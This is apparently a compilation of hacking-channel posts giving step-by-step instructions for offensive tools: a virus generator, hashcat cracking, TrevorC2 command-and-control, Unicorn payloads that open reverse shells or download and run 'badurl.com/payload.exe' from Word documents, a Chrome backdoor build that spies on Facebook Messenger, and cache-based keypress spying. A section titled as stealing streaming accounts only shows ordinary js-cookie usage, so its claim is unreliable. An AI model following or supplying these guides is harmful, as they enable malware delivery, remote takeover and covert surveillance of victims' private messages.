▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑How Create Virus on Termux/Linux Without root - simple example
instagram.com/UndercodeTestingCompany

🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ:

1) apt update && apt upgrade

2) apt install git

3) apt install python && apt install python2

4) git clone https://github.com/TheReaper167/Malicious

5) cd Malicious

6) pip2 install -r requirements.txt

7) pip2 install requests

8) python2 malicious.py

9) after download virus open your file explorer

10) p find folder Malicious and open it

11) chose and open folder Android if you download virus Android

M̵͘ ̠̖r̶̕.̵́ ̷͠B̴͘O̷̓T̶̆Ń̴E̶͛T̶̅(tm
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Automate Cracking
For Linux & root termux
t.me/UndercOdeTestingOfficial

🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ:

1) mkdir -p hashcat/deps

2) git clone https://github.com/KhronosGroup/OpenCL-Headers.git

3) hashcat/deps/OpenCL

4) cd hashcat/

5) make

6) make install

7) python wordlist_optimizer.py <input file list> <output directory>

8) python wordlist_optimizer.py wordlists.txt ../optimized_wordlists

9) hashcat --help |grep -i ntlm
5500 | NetNTLMv1 | Network protocols
5500 | NetNTLMv1 + ESS | Network protocols
5600 | NetNTLMv2 | Network protocols
1000 | NTLM | Operating-Systems

🦑Features :

(1) Quick Crack
(2) Extensive Pure_Hate Methodology Crack
(3) Brute Force Attack
(4) Top Mask Attack
(5) Fingerprint Attack
(6) Combinator Attack
(7) Hybrid Attack
(8) Pathwell Top 100 Mask Brute Force Crack
(9) PRINCE Attack
(10) YOLO Combinator Attack
(11) Middle Combinator Attack
(12) Thorough Combinator Attack
🦑Tested by UndercOde On:

> Ubanto

@M̵͘ ̠̖r̶̕.̵́ ̷͠B̴͘O̷̓T̶̆Ń̴E̶͛T̶̅(tm
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 New release 2019 in tool for using a PowerShell downgrade attack and inject shellcode straight into memory
> you will need a place that supports remote command injection of some sort. Often times this could be through an excel/word doc or through psexec_commands inside of Metasploit, SQLi, etc.. There are so many implications and scenarios to where you can use this attack
> use for learning only
instagram.com/UndercOdeTestingCompany

🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ:

1) git clone https://github.com/trustedsec/unicorn

2) cd unicorn

3) python unicorn.py

4) Commands :

> python unicorn.py payload reverse_ipaddr port <optional hta or macro, crt>

> PS Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443

> PS Down/Exec: python unicorn.py windows/download_exec url=http://badurl.com/payload.exe

> Macro Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 macro

> Macro Example CS: python unicorn.py <cobalt_strike_file.cs> cs macro

> Macro Example Shellcode: python unicorn.py <path_to_shellcode.txt> shellcode macro

> HTA Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 hta

> HTA Example CS: python unicorn.py <cobalt_strike_file.cs> cs hta

> HTA Example Shellcode: python unicorn.py <path_to_shellcode.txt>: shellcode hta

> DDE Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 dde

>CRT Example: python unicorn.py <path_to_payload/exe_encode> crt

>Custom PS1 Example: python unicorn.py <path to ps1 file>

> Custom PS1 Example: python unicorn.py <path to ps1 file> macro 500

> Cobalt Strike Example: python unicorn.py <cobalt_strike_file.cs> cs (export CS in C# format)

>Custom Shellcode: python unicorn.py <path_to_shellcode.txt> shellcode (formatted 0x00)
Help Menu: python unicorn.py --help

🦑 to apply the payload :

1) Open Word

2) Insert tab -> Quick Parts -> Field

3) Choose = (Formula) and click ok.

4) Once the field is inserted, you should now see "!Unexpected End of Formula"

5) Right-click the Field, choose "Toggle Field Codes"

6) Paste in the code from Unicorn

7) Save the Word document.

E N J O Y
@M̵͘ ̠̖r̶̕.̵́ ̷͠B̴͘O̷̓T̶̆Ń̴E̶͛T̶̅(tm
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑TrevorC2 - Command and Control via Legitimate Behavior over HTTP
instagram.com/UndercOdeTestingCompany

🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ:

1) git clone https://github.com/trustedsec/trevorc2

2) cd trevorc2

3) pip install -r requirements.txt

4) trevor2_server.py

> to edit the file first, and customize, what website you want to clone, etc. The server will clone a website of your choosing and stand up a server. This server is browsable by anyone and looks like a legitimate website. Contained within the source is parameter that (again is configurable), which contains the instructions for the client. Once a client connects, it searches for that parameter, then uses it to execute commands.

5) trevor2_client.py

> all you need in any configurable option is the ability to call out to a website, parse some basic data, and then execute a command and then put the results in a base64 encoded query string parameter to the site. That's it, not hard.

6) trevor2_client.ps1

> powershell implementation of trevor2_client.py, this allows you to use native PowerShell to interact with Trevor2_Server.

🦑Dockerfile:

1) git clone https://github.com/trustedsec/trevorc2.git

2) cd trevorc2
# At this point, setting up docker-machine to remotly deploy works great

3) docker build -t trevorc2 .

4) docker run -it -p 80:80 -p 443:443 trevorc2

USE FOR LEARN ONLY

@M̵͘ ̠̖r̶̕.̵́ ̷͠B̴͘O̷̓T̶̆Ń̴E̶͛T̶̅(tm
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Test WPA3 using virtual Wi-Fi interfaces
t.me/undercOdeTestingOfficial

🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ:

1) git clone https://github.com/vanhoefm/hostap-wpa3

2) cd hostapd-wpa3

3) cp defconfig .config

4) make -j 2

5) cd ..

6) now for wpa_supplicant:

> cd wpa_supplicant

7) cp defconfig .config

8) make -j 2

9) sudo modprobe mac80211_hwsim radios=3

> rfkill unblock wifi

`10) Optionally kill other Wi-Fi clients the brute-for way:

> sudo pkill wpa_supplicant

11) Open a new terminal, and in the directory hostapd execute:

> sudo ./hostapd hostapd_wpa3.conf -dd -K

12) Open another terminal, and in the directory wpa_supplicant execute:

> sudo ./wpa_supplicant -D nl80211 -i wlan1 -c supp_wpa3.conf -dd -K

Written by M̵͘ ̠̖r̶̕.̵́ ̷͠B̴͘O̷̓T̶̆Ń̴E̶͛T̶̅(tm
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁


🦑IP Spoofing FULL :

The term IP (Internet Protocol) address spoofing refers to the creation of IP packets with a forged (spoofed) source IP address with the purpose of concealing the identity of the sender or impersonating another computing system.
T.me/UnderCodeTestingOfficial

🦑Why it works ?
IP-Spoofing works because trusted services only rely on network address based authentication. Since IP is easily duped, address forgery is not difficult.
The main reason is security weakness in the TCP protocol known as sequence number prediction.

🦑How it works ?
To completely understand how ip spoofing can take place, one must examine the structure of the TCP/IP protocol suite. A basic understanding of these headers and network exchanges is crucial to the process.

🦑Internet Protocol (IP) :
It is a network protocol operating at layer 3 (network) of the OSI model. It is a connectionless model, meaning there is no information regarding transaction state, which is used to route packets on a network. Additionally, there is no method in place to ensure that a packet is properly delivered to the destination.

> Examining the IP header, we can see that the first 12 bytes (or the top 3 rows of the header) contain various information about the packet. The next 8 bytes (the next 2 rows), however, contains the source and destination IP addresses. Using one of several tools, an attacker can easily modify these addresses – specifically the “source address” field.

🦑Transmission Control Protocol (TCP) :
It is the connection-oriented, reliable transport protocol in the TCP/IP suite. Connection-oriented simply means that the two hosts participating in a discussion must first establish a connection via the 3-way handshake (SYN-SYN/ACK-ACK). Reliability is provided by data sequencing and acknowledgement. TCP assigns sequence numbers to every segment and acknowledges any and all data segments recieved from the other end.


> As you can see above, the first 12 bytes of the TCP packet, which contain port and sequencing information.

> TCP sequence numbers can simply be thought of as 32-bit counters. They range from 0 to 4,294,967,295. Every byte of data exchanged across a TCP connection (along with certain flags) is sequenced. The sequence number field in the TCP header will contain the sequence number of the *first* byte of data in the TCP segment. The acknowledgement number field in the TCP header holds the value of next *expected* sequence number, and also acknowledges *all* data up through this ACK number minus one.

> TCP packets can be manipulated using several packet crafting softwares available on the internet.

🦑The Attack
IP-spoofing consists of several steps. First, the target host is choosen. Next, a pattern of trust is discovered, along with a trusted host. The trusted host is then disabled, and the target's TCP sequence numbers are sampled. The trusted host is impersonated, the sequence numbers guessed, and a connection attempt is made to a service that only requires address-based authentication. If successful, the attacker executes a simple command to leave a backdoor.

> Spoofing can be implemented by different ways as given below -

🦑Non-Blind Spoofing :- This type of attack takes place when the attacker is on the same subnet as the victim. The sequence and acknowledgement numbers can be sniffed, eliminating the potential difficulty of calculating them accurately.

🦑Blind Spoofing :- Here the sequence and acknowledgement numbers are unreachable. In order to circumvent this, several packets are sent to the target machine in order to sample sequence numbers.

🦑Usage :


IP spoofing is almost always used in what is currently one of the most difficult attacks to defend against – Denial of Service attacks, or DoS.

@M̵͘ ̠̖r̶̕.̵́ ̷͠B̴͘O̷̓T̶̆Ń̴E̶͛T̶̅(tm)

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑ITWSV- Integrated Tool for Web Security Vulnerability.
ITWSV is automated penetration testing tool which performs information gathering, auditing and reporting.
Instagram.com/UndercodeTestingCompany


🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ:

1) git clone https://github.com/penetrate2hack/ITWSV.git

2) cd ITWSV

3) chmod +x start.sh

4) chmod +x update.sh (only if required)

5) ./start.sh

🦑FEATURES :
• WHOIS
• DNSWALK
• FIERCE
• DNSRecon
• DNSenum
• NMAP
• DMitry
• theHarvester
• LBD
• SSLScan
• SSLYze
• WhatWeb
• Automater
• Grabber
• Parsero
• Uniscan
• Metagoofil
• A2SV
• WPScan
• Droopescan
• WPSeku
• XssPy
• Spaghetti
• sublist3r
• WAFW00F
• nslookup
• nslookup
• dirsearch
• OWASP Joomscan
• Spaghetti
• Globuster
• Grabber

🦑TESTED ON :

> PARROT

> DEBIAN

> KALI


@M̵͘ ̠̖r̶̕.̵́ ̷͠B̴͘O̷̓T̶̆Ń̴E̶͛T̶̅(tm
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑How to be completely anonymous online by undercOde:
t.me/UndercOdeTestingOfficial

🦑🅻🅴🆃 🆂 🆂🆃🅰️🆁🆃:

1) use a fake mac adress for your wlan card

2) use your linux or windows in vm machine

3) use unonsurf tool (vpn+tor server and much more)

>git clone https://github.com/Und3rf10w/kali-anonsurf

> cd kali-anonsurf

> ./installer.sh

4) use proxies

5) make sure you have lastest updates installed on your system

6) never maximize any browser

7) Never think you can be anonymous on rooted- or non rooted phone😆

! well done

@M̵͘ ̠̖r̶̕.̵́ ̷͠B̴͘O̷̓T̶̆Ń̴E̶͛T̶̅(tm
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

------𝖀𝖓D𝖊𝖗𝕮𝖔D𝖊-----

🦑HACK FACEBOOK MESSANGER USING CHROME BACKDOOR ?
(t.me/UndercodeTestingOfficial)
☠️FULL GUIDE☠️


🦑INSTALLISATION :

So first we need to git clone the tool.
[bash]

1)git clone https://github.com/graniet/chromebackdoor.git[/bash]

2)We can then cd into that directory, and we need to install some dependencies.
[bash]

3)apt-get install -y python-pip[/bash]


4)As we are using ubuntu we need to install python-m2crytpto
[bash]apt-get install python-m2crypto[/bash]


5)Now we can install crxmake
[bash]pip install crxmake[/bash]



6)Before we run the program it will require us to enable https, we can do this by using a built-in package within the LAMP ubuntu server, letsencrypt
[bash]letsencrypt –apache[/bash]



7)We then need to follow the steps within the setup. First by entering in a domain name “c2.iminyour.network”. Followed by an email address “dale@demmsec.co.uk”. Then we need to accept the terms of service, and we only allow it to be accessed over https.

8)We can now run chromebackdoor
[bash]python chromebackdoor.py[/bash]


9)This runs the program however in order to create the backdoor we need to use an argument, for this we are going to use the –chrome argument
[bash]python chromebackdoor.py –chrome[/bash]



10)So these next steps are kinda confusing, and the English in the program isn’t well written, which doesn’t help. So we need to add where the website will be hosted, in this case, we use the full URL of “https://c2.iminyour.network/chromebackdoor” then we add what we think is meant to be relay, so we enter “relais” and confirm the information is correct. We are then presented with a list menu which for this video we use the Facebook Messenger Spy, so we enter “4” and this has now created a zip folder. We can now unzip the folder
[bash]unzip 22029.zip[/bash]



11)From the files that have been extracted, we then need to change the config.php file located in the /web/includes directory using your preferred text editor. We then change the first line of the .php file to.
(Instagram.com/UndercodeTestingCompany)

12)sbdd = PDO('mysql:host=localhost ; dbname=chromebackdoor', 'root','toor');


13)If you are using DigitalOcean the password file is located in
[bash]~/.digitalocean_password[/bash]



14)We can copy this and add it to our config file so we go back to the file and amend the first line and enter our DigitalOcean password

15)sbdd = PDO('mysql:host=localhost ; dbname=chromebackdoor', 'root','newpassword');


16)We then need to install phpmyadmin and auto config apache 2
[bash] apt-get install phpmyadmin[/bash]



17)We are going to use the copied password from DigitalOcean for the phpmyadmin. Once the configuration has finished we can then access the phpmyadmin web portal to add chromebackdoor to the database.

18)We need to locate the chromebackdoor.sql file we can easily find this with mobaXterm with the side panel. We then create a new folder on are host machine and copy the chromebackdoor.sql into our new folder. We then need to go back to phpmyadmin and import that file. Once that has been imported and saved we can then go to that web directory which will navigate us to the chromebackdooor web portal. We can use the credentials that are in the chromebackdoor.sql which is “root” and “toor” as you can see there will be nothing in the web portal.

19)If we go back to our terminal we need to add i368 architecture to enable us to use wine.
[bash]dpkg –add-architecture i386[/bash]


20)Then we need to install wine
[bash] apt-get install wine[/bash]



21)This will throw errors at us, however, we can run the command to fix this issue
[bash] dpkg –configure -a[/bash]
(join t.me/UndercodeTestingOfficial)

22)Now this is done we can use the build argument for the chromebackdoor
[bash]python chormebackdoor.py –build[/bash]

23)We are then asked the backdoor type, in this case, it is “–chrome” we then need to enter the location of the file “/var/www/html/chromebook/backdoor.crx” this will start the install and will throw loads of errors at us, but its nothing to worry about. We are then given the option to use a Rubber Ducky Payload for this we choose “n”

24)We can then navigate to our payload “https://c2.iminyour.network/chromebackdoor/bot.exe” this will download the file and if you have anti-virus installed, it should alert you, well it did with avast anyway 😀

25)We can then run the program which will kill chrome but this will add the extension to chrome. If we go back to the web portal we will be able to see a bot. This should now, in theory, log any facebook messages that are sent or received while the payload is running, although this is not the case. We do a bit of troubleshooting and realize that we need to install curl [bash]apt-get install -y php-curl[/bash]

26)We then need to amend the apache php.ini file located in /etc/php/7.0/apache2/ then search for “curl” by using ctrl + w within nano and remove the “;” from the line

27)extension=php_curl.dll
after this restart apache [bash] service apache2 restart[/bash] and now we can retest by sending another message and we should be able to see messages being saved within the web portal.

🦑i dont said we should but we don’t, so we need to go back to our terminal and copy our .js files to the chromebackdoor directory [bash] cp *.js ../[/bash]

We then finally need to amend the facebookmessage.js file that we have just moved. Locate the line that has “http” in it and change it to “https” and then a few lines down change the line that has “http://localhost:8888…” to our domain. “https://iminyour.network /chromebackdoor/….”



And now!! Finally!! it is working!! We should now be able to see messages being recorded!

ENJOY :)

WRITTEN BY Airlin
-----𝖀𝖓D𝖊𝖗𝕮𝖔D𝖊-----

———Under𝕮𝖔d𝖊-——-


🦑STEP BY STEP HOW POLICE TRACK
locate a lost CELL
t.me/UndercodeTestingOfficial)

🦑Step 1 – it can be tracked by – IMEI Number as well as by mobile phone number , if you don’t remember the IMEI number of your mobile phone , Then your IMEI number can be easily obtained by the telecom operator company whose sim card is being used in that cell phone. Once you tell your mobile number to your telecom operator , They will tell you the IMEI Number of the cell phone in which that sim card was being used. Because whenever you insert a sim card in any cell phone and switch ON , Then it connect to the network, and your telecom operator automatically register the IMEI number of the device on network.

Step 2 – This is sure , if your phone has been stolen , The person who had stolen will defiantly switch off your cell phone , remove & either break or throughout your sim card as well as, if he is enough intelligent he will format / wipe data / factory restore that cell phone. So that any tracking software installed in the cell phone get removed
from the phone.
Open In App Sign In

Step 3 – Now he will insert his own or another Sim card in that cell phone and switch ON your cell phone . Once it connect to the network of any telecom operator , Again the IMEI Number of your cell phone will be registered on the network with different mobile number.


Step 4 – Now police department makes an enquiry from Telecom regulatory authority of your country about your Mobile IMEI Number. They will provide them the detail of that telecom operator name with the mobile number of sim card currently being used in your cell phone.

Step 5 – Now police department will contact the telecom operator of that mobile number whose sim card is being currently used in your mobile phone. The telecom operator will provide the details of all those Base tower stations (Mobile towers) , who are currently providing network to your mobile phone. Every BTS has different ID , to identify the area location .

Step 6 – Now let me tell you that – whenever your cell phone is Switched ON and accessing the network . at a time your cell phone is connected with more than one Mobile towers(BTS) located in that area. But the communication is made from only that tower which is nearest to the mobile phone location.

Step 7 – Now the theory of triangulation is applied to find exact location of your cell phone . In this method a virtual triangle of signals (radio waves) is created between the mobile phone and 3 towers who are providing network to the cell phone. Now the angle at which your cell phone exists is calculated by a mathematical formula . In this way police trace & locate any cell phone location.

🦑For Android Mobile phone :
Android Device Manager ( NO GPS Required)– This is an ultimate phone tracing software which is launched itself by Google for protection of android devices. It works even if the sim card of your cell phone is changed. This software is inbuilt in every android cell phone , but you need to manually activate this software . In order to activate this application , Go to > settings > security >Device administrator > Android device manager. Here you need to activate this software , once you activate this software , you will be able to Trace the location of your phone any time on internet by logging in to this url –
https://www.google.com/ android / device manager once you go to this url , enter your Google play store user name and password . you will be able to see the current location of your cell phone. Remember this technology of tracing cell phone does not require GPS.You can remotely , wipe data on your phone , lock & change phone password , make a loud ring etc . which may help in finding your phone. The only weaker point of this application is that , if you hard reset your phone / factory restore that phone , this application will not work.


@ mr botnet
-------𝖀𝖓D𝖊𝖗𝕮𝖔D𝖊------

Mery Christmas For all Christians Friends

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑What is Side-Channel Attack ?
t.me/UndercOdeTestingOfficial

🦑🅻🅴🆃 🆂 🆂🆃🅰️🆁🆃:

> A side-channel attack (SCA) is a security exploit that involves collecting information about what a computing device does when it is performing cryptographic operations and using that information to reverse engineer the device's cryptography system.

> In computing, a side channel is any communication channel that is incidental to another communication channel. Security researcher Paul Kocher is credited with coining the term side-channel attack in the 1990s when he discovered it was possible to reverse engineer security tokens by monitoring a computer's power consumption and electromagnetic emissions.

> Unlike many other types of security exploits, side-channel attacks are hardware and software agnostic. Instead of targeting a software vulnerability caused by a coding error or configuration drift, the attacker exploits the way the device's operating system (OS) accesses the hardware upon which the OS runs. Side-channel attacks can be launched against any operating system, including Windows and Linux.

Powred by wii Wiki
@ M̵͘ ̠̖r̶̕.̵́ ̷͠B̴͘O̷̓T̶̆Ń̴E̶͛T̶̅(tm
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁


🦑ALL Types of Side-Channel Attacks
instagram.com/UndercOdeTestingCompany

🦑🅻🅴🆃 🆂 🆂🆃🅰️🆁🆃:

> Side-channel attacks work by monitoring the emissions produced by electronic circuits when the victim's computer is being used. In addition to exploiting information about power consumption and electromagnetic fields, an attacker may actually listen to the sounds a central processing unit (CPU) produces and use that information to reverse engineer what the computer is doing. This type of side-channel attack is called an acoustic cryptanalysis attack. Other types of side-channel attack include:

1) Cache attacks that exploit how and when cache is accessed in a physical system.

2) Differential fault analysis attacks that seek to gleam information from a system by introducing faults into the system’s computations.

3) Timing attacks that track the movement of data to and from a system's CPU and memory.

4) Thermal-imaging attacks that use infrared images to observe the surface of a CPU chip and collect executed code.

5) Optical side-channel attacks that collect information about hard disk activity by using a audio/visual recorder, such as a video camera.

@M̵͘ ̠̖r̶̕.̵́ ̷͠B̴͘O̷̓T̶̆Ń̴E̶͛T̶̅(tm
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Advanced Side-Channel Analysis Toolfirst step for attack ( tested ):
instagram.com/UndercOdeTestingCompany

🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ:

1) git clone https://github.com/Ledger-Donjon/lascar

2) cd lascar

3) python3 setup.py install --user

4) cd docs/

5) make html

🦑Requirements :

> numpy
> scipy
>matplotlib: for curve visualization
>vispy: for curve visualization
>sklearn: for machine learning
>keras: for deep learning
>tensorflow: keras backend
>h5py: for data storage
>progressbar2
>pytest
>numba

🦑Tutorial:
> https://github.com/Ledger-Donjon/lascar/blob/master/tutorial/01-discovering-containers.py
>https://github.com/Ledger-Donjon/lascar/blob/master/tutorial/07-session-dpa-example.py

@M̵͘ ̠̖r̶̕.̵́ ̷͠B̴͘O̷̓T̶̆Ń̴E̶͛T̶̅(tm
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Dangerous tools to perform Cache Template Attacks
twitter.com/UndercOdeTC

🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ:

1) git clone https://github.com/IAIK/cache_template_attacks

2) cd cache_template_attacks

3) cd calibration

4) make

5) ./calibration

🦑Running :

1) Automated keypress profiling

> cd profiling/linux_low_frequency_example

> make

> ./spy.sh 5 200 gedit # in our example we profile keypresses in gedit

2) Keypresses (with libxdotool)
In this example we perform some steps by hand to illustrate what happens in the background. Therefore, we will first find the address range to attack:

> $ cat /proc/ps -A | grep gedit | grep -oE "^[0-9]+"/maps | grep r-x | grep gdk-3
7fc963a05000-7fc963ab4000 r-xp 00000000 fc:01 2637370 /usr/lib/x86_64-linux-gnu/libgdk-3.so.0.1200.2

3) Switch to an already opened gedit window before ./spy is started. On Linux, run the following lines:

> cd profiling/linux_low_frequency_example

>make

> echo "switch to gedit window"

>sleep 5; ./spy 200 7fc963a05000-7fc963ab4000 r-xp 00000000 fc:01 2637370 /usr/lib/x86_64-linux-gnu/libgd

4) On Windows with MSYS/MinGW, run the following lines:

> cd profiling/windows_low_frequency_example

> mingw32-make

>echo "switch to notepad window"

> sleep 5; ./spy 200 C:\Windows\System32\notepad.exe > notepad.csv

5) This one had 126 cache hits during 122 key presses of the key N. And almost none when pressing other keys.

To verify our results we will now use the generic exploitation spy tool:

> cd exploitation/generic

> make

> ./spy /usr/lib/x86_64-linux-gnu/libgdk-3.so.0.1200.2 0x85ec0

6) OpenSSL AES T-Table attack
This example requires a self-compiled OpenSSL library to enable it's T-Table-based AES implementation. Place libcrypto.so in the same folder and make sure the program actually uses it as a shared library. Then run

> cd profiling/aes_example
>make
>./spy

🦑Fully automated attack
In this example we will run a script which will automatically execute the profiling phase as described before and then switch to the multi_spy exploitation tool as soon as a result is available.

Then run

1) cd exploitation/multi_spy

2) make

3) cd ../../profiling/linux_low_frequency_automated

4) ./spy.sh 5 200 /usr/lib/x86_64-linux-gnu/libgdk-3.so.0.1200.2

@M̵͘ ̠̖r̶̕.̵́ ̷͠B̴͘O̷̓T̶̆Ń̴E̶͛T̶̅(tm
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑hOW Does Attackers got all accounts(netflix/spootify/steam...) for victims without their knowledge Tuto buy UndercOde
instagram.com/UndercOdeTestingCompany

🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ:

1) git clone https://github.com/js-cookie/js-cookie

2) cd js-cookie

3) npm i js-cookie

4) Create a cookie, valid across the entire site:

Cookies.set('name', 'value')

5) Create a cookie that expires 7 days from now, valid across the entire site:

Cookies.set('name', 'value', { expires: 7 })
Create an expiring cookie, valid to the path of the current page:

Cookies.set('name', 'value', { expires: 7, path: '' })

6) Read cookie:

Cookies.get('name') // => 'value'
Cookies.get('nothing') // => undefined

7) Read all visible cookies:

Cookies.get() // => { name: 'value' }
Note: It is not possible to read a particular cookie by passing one of the cookie attributes (which may or may not have been used when writing the cookie in question):

Cookies.get('foo', { domain: 'sub.example.com' }) // domain won't have any effect...!

8) The cookie with the name foo will only be available on .get() if it's visible from where the code is called; the domain and/or path attribute will not have an effect when reading.

9) Delete cookie:

Cookies.remove('name')

10) Delete a cookie valid to the path of the current page:

Cookies.set('name', 'value', { path: '' })
Cookies.remove('name') // fail!
Cookies.remove('name', { path: '' }) // removed!

> IMPORTANT! When deleting a cookie and you're not relying on the default attributes, you must pass the exact same path and domain attributes that were used to set the cookie:

Cookies.remove('name', { path: '', domain: '.yourdomain.com' })

USE FOR LEARNING ONLY

Written by UndercOde

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

Enjoy on
T.me/UndercOdeTestingOfficial

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑2019 new update Octant is a great tool for developers to understand how applications run on a Kubernetes cluster. It aims to be part of the developer's toolkit for gaining insight and approaching complexity found in Kubernetes. Octant offers a combination of introspective tooling, cluster navigation, and object management along with a plugin system to further extend its capabilities.
instagram.com/UndercOdeTestingCompany

🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ:

On Any Debian base Os :(kali/parrot...)
1) Download https://github.com/vmware-tanzu/octant/releases/download/v0.9.1/octant_0.9.1_Linux-64bit.deb

2) cd Downloads

3) dpkg -i (name of Downloaded File)

🦑For Windows :

1) install using chocolatey with the following one-liner:

> choco install octant --confirm

2) Scoop

Add the extras bucket.

> download https://github.com/lukesampson/scoop-extras
+ cmd run :

> scoop bucket add extras

3) Install using scoop.

> scoop install octant

🦑Mac os

> brew install octant

🦑If You Download The .zip From release page :
> https://github.com/vmware-tanzu/octant/releases

1) tar -xzvf ~/Downloads/octant_0.X.Y_Linux-64bit.tar.gz

(octant_0.X.Y_Linux-64bit/README.md
octant_0.X.Y_Linux-64bit/octant)

2) Verify it runs:

3) ./octant_0.X.Y_Linux-64bit/octant version

🦑Tested by UndercOcde :

> Ubanto

@M̵͘ ̠̖r̶̕.̵́ ̷͠B̴͘O̷̓T̶̆Ń̴E̶͛T̶̅(tm
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁